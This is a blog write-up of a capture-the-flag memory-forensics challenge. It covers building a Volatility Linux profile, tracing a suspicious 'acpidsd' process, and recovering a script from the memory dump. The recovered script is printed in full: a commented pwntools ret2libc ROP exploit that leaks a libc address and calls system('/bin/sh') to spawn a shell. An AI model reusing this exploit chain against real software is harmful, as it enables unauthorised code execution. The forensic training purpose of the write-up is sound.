ICMTC CTF — DFIR Challenge Writeup (Invade)

Ebrahim Mustafa
4 min readJul 31, 2023

--

First, I used ‘vol.py’ and it didn’t work because this is not a windows image. Then I used windbg and it didn’t work too. After some time, I searched with ‘strings’ for “windows”, and here is the big mistake that the tool gave me “windows 11 x64 kernel“. I started creating a profile for windows 11, and this was the second big mistake. The organizer told me to try Linux, and I found the kernel and distribution version. I tried to download Linux header to create a profile, and this didn’t work on Kali.

I started searching for the right distribution and downloaded it, then my network connection said to me: “goodbye my brother”.

When I came back home, I downloaded the challenge again and started to work on it, and I found another error in Kali and ‘vol.py’, but I solved it.

The hard work starts now:

First, download Ubuntu form this site:

http://old-releases.ubuntu.com/releases/18.04.3/

Second, install it to a VM.

I installed ‘vol’ and started to create a profile:

Let’s check Kernel version:

Ok, let’s create a profile:

Now, let’s create the right profile. Let’s copy it to Kali to start the work. After we copy it, we will add the file to the right path to work.

This is the right path: ` volatility/volatility/plugins/overlays/linux/`

First check the profile is added or not:

It’s added. Now, let’s start analysis using ‘linux_pslist’, or you can use ‘linux_pstree’ if this is the first time to use Linux for more details:

I found suspicious process with the name “acpidsd” with “PID:4037”, and after looking the PID, I found the parent process is “python3.8” with “PID:4033”, and child process is “sh”.

Ok, let’s get the process address using “linux volshell” or “linux_procmap –p” or “linux_procmap_rb”. Then use “linux_volshell >> cc(pid = 4037)“

Let’s get the second flag.

Attack name:

I noticed “python3.8” trying to dump process or where the filename runs because python code didn’t load in memory.

I will use:

linux_dump_map -p 4037

and start analyses output

with ‘strings *.vma’ and search for acpidsd

now I noticed /usr/bin/mtrr and old pwd is /home/egcert and /usr/bin/acpidsd

Let’s start search with “cat” in original “vmem” file to “mtrr” using “string” and “grep”.

String “ meme.vmem|grep –A 4 ‘mtrr’ ”

I found this script:

After decoding it, we got this result:

I will use ChatGPT to explain what the code will do:

The full code is:

from pwn import *

# Set architecture to amd64

context.arch = ‘amd64’

# Define constants

K = 120

# Load the ELF binary

m = ELF(“./acpidsd”)

# Start a process to interact with the binary

x = m.process()

# Create a ROP gadget object for the binary

g = ROP(m)

# Call the “puts” function with the “puts” Global Offset Table (GOT) entry as an argument

g.call(m.symbols[‘puts’], [m.got[“puts”]])

# Call the “processInput” function using ROP chaining

g.call(m.symbols[“processInput”])

# Receive and discard some initial output from the process

x.recvuntil(b”\n”)

x.recvuntil(b”\n”)

x.recvuntil(b”\n”)

# Craft the payload by chaining ‘A’ * K bytes and the ROP chain

V = [b”A” * K, g.chain()]

V = b””.join(V)

# Send the payload to the process

x.sendline(V)

# Receive the output from the process and extract the leaked address

y = u64(x.recvline(“\n”).rstrip().ljust(8, b”\x00"))

# Load the libc binary

s = ELF(‘/usr/local/libc6_2.27–3ubuntu1.6_amd64.so’)

# Calculate the base address of the loaded libc using the leaked “puts” address

s.address = y — s.symbols[“puts”]

# Create a ROP gadget object for the libc

M = ROP(s)

# Find the address of the “/bin/sh” string in libc and use it as an argument for the “puts” and “system” functions

M.call(“puts”, [u(s.search(b”/bin/sh\x00"))])

M.call(“system”, [u(s.search(b”/bin/sh\x00"))])

# Call the “exit” function to gracefully terminate the process

M.call(“exit”)

# Craft the final payload by chaining ‘A’ * K bytes and the libc ROP chain

n = [b”A” * K, M.chain()]

n = b””.join(n)

# Send the final payload to the process

x.sendline(n)

# Interact with the process to gain control and access the shell

x.interactive()

And this is the result:

Attack name is “ropchain” and the function is “puts”.

The flag is:

EGCERT(0x15d9e000,ROPCHAIN,puts)

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

--

--

Ebrahim Mustafa
Ebrahim Mustafa

Written by Ebrahim Mustafa

Cyber Security Pentester ,Bug hunter ,CTF player and Coder

No responses yet

Write a response